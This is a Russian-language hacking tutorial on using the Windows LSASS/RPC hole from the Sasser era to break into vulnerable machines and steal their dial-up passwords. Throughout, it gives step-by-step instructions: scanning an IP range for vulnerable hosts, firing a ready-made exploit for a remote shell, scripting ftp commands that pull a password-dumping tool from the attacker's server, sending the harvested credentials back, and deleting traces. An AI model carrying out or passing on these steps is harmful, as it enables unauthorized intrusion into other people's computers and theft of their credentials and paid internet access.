Предисловие :
В наше жестокое время становиться всё сложнее и сложнее добывать инет ... время легиона прошло ... Net tools тоже не катит ... но! О БОЖЕ ! к нам в руки попал сплоит kaht2 , использующий дыру winXP/2k RPC (Remoute Procedure Call – по-нашему вызов удалённых процедур) , и естесственно в сеть выполз червь под всем известным именем Msblast , он же Lovesan ... эта зараза перезагружала уязвимую систему через 60 сек … Естественно юзерам не понравилась эта шняга , и все судорожно набирали никому незнакомую ссылку windowsupdate.microsoft.com и качали патчи от этой бяки , и естественно немного поюзав эту уязвимость кулцацкерам надоела надпись Exploit Failed ... хотелось большего , и наконец вышла новая аналогичная уязвимость lsass процесса и червь sasser , но сплоит был довольно не стабильный , и особо одарённым было сложновато его юзать ... сейчас я расскажу как упростить это дело и какой софт для этого нужен =)
Начнём :
Для нашего злого дела нам нужно всего три (четыре, если считать FTP сервер) программки - сканер на уязвимые машины червём sasser – DSScan(foundstone.com) ... очень полезная программулина SmallSoft Lsa Service Exploit(smallsoft.net.ru) , к сожалению, я не знаю автора думаю, он меня простит 
(ссылки на весь нужный софт в конце статьи), и известная всем фриинетчикам прога dialupass2, показывающая все данные dialup (включая пароль)
DSScan выглядит так:
SmallSoft Lsa Service Exploit выглядит так:
Для охоты нам нужно выбрать диапазон IP адресов, возьмём мою любимую экву (57.66.158.1-57.66.158.255). В сканер Dsscan записываем Start IP 57.66.158.1 и End IP 57.66.158.255, нажимаем -> и синюю стрелочку вправо, сканирование началось, внизу начали появляться Ip-шники, самый важный для нас столбец это “Status” – Not Vulnerable – означает, что система не пропатчена или профаерволена, VLNERABLE – значит, система уязвима – то, что нам надо!
Далее на IP уязвимой машины нажимаем правой кнопкой мыши и нажимаем “Copy IP to Clipboard” , этим самым мы скопировали IP ... Теперь нужно атаковать удалённый комп, открываем SmallSoft Lsa Service Exploit , в строку IP-адрес вставляем скопированный нами IP , шелл порт оставляем, как есть, тип атаки выбираем «Шелл» и нажимает кнопочку «НАЧАТЬ» Должно появиться что-то вроде этого:
Если вы увидели это, то атака прошла успешно
Спустя некоторое временя появиться ДОСовское окошко – это происходит подключение к удалённому компьютеру и рано или поздно вы увидите что-то вроде этого:
Кто юзал Kaht2 могут дальше не читать, а кто новичок в этом деле – читайте дальше ...
Перед вами удалённая командная строка, теперь мы можем творить с этим компьютером всё, что захотим, но нам нужны пароли от dialup ...
Для начала создайте папочку Temp на диске D: или на каком вам удобно и киньте туда файлик dialupass2.exe прежде переименовав его в z.exe.
И так приступим запускаем наш FTP сервер и заходим в раздел User Accounts
Нажимаем кнопку add (2) в появившемся окошке впишите имя пользователя к примеру a нажимаем ok дальше нам необходимо выбрать папку откуда будут закачивается и выкачиваться файлы – это и есть папка Temp, где лежит наш z.exe (3) далее укажите пароль для этого пользователя к примеру тоже a =) (4), расставьте все стрелки, кроме Allow delete и нажмите кнопку Update (5). После всех проделанных действий необходимо потестить как оно работает или нет. Нажимаем в вверху зеленую кнопку(1) и переходим в раздел Server Log, если написано: “FTP server started on port 21” , то всё сконфигурировано удачно.
Теперь возвращаемся в удалённую командную строку и там пишем
Cd [переходим в корневую директорию]
echo open xxx.xxx.xxx.xxx>go&&echo a>>go&&echo a>>go [где xxx.xxx.xxx.xxx – это ваш IP, этой командой мы создаём на диске C: удалённой машины файл go – он нужен для подключения к вашему ftp серверу]
ftp –s:go [подключаемся к ftp]
Если ты все правильно сделал, то в FTP сервере в разделе Server Log ты увидишь что-то типа этого:
Далее пишем:
get z.exe
после выполнения этой команды в Server Log должны появится строки:
Последняя строка показывает вам, что файл успешно закачен.
Этой командой мы закачали dialupass2 на удаленный компьютер. Теперь нам надо его запустить пишем в консоле:
bye [отключаем свой удаленный компьютер от вашего FTP сервера и переходим снова в консоль]
тим мы запускаем dialupass на удаленном компьютере и все содержимое отчета выводим в соответствующую папку и в файл ps.html. Теперь нам только осталась забрать файл ps.html
Далее пишем:
ftp –s:go [опять подключаемся к ftp со сценарием, находящимся в файле go]
send ps.html [этой командой мы отправляем с удалённого компа к себе на ftp файл, созданный dialupass2]
Смотрим Server Log должна пойти закачка. После того как файл закачается пишем
bye
del go [Удаляем следы с удаленного компьютера]
del z.exe
del ps.html
Вот и все теперь у тебя в папке FTP сервера лежит файл ps.html в нем находятся Dialup пароли.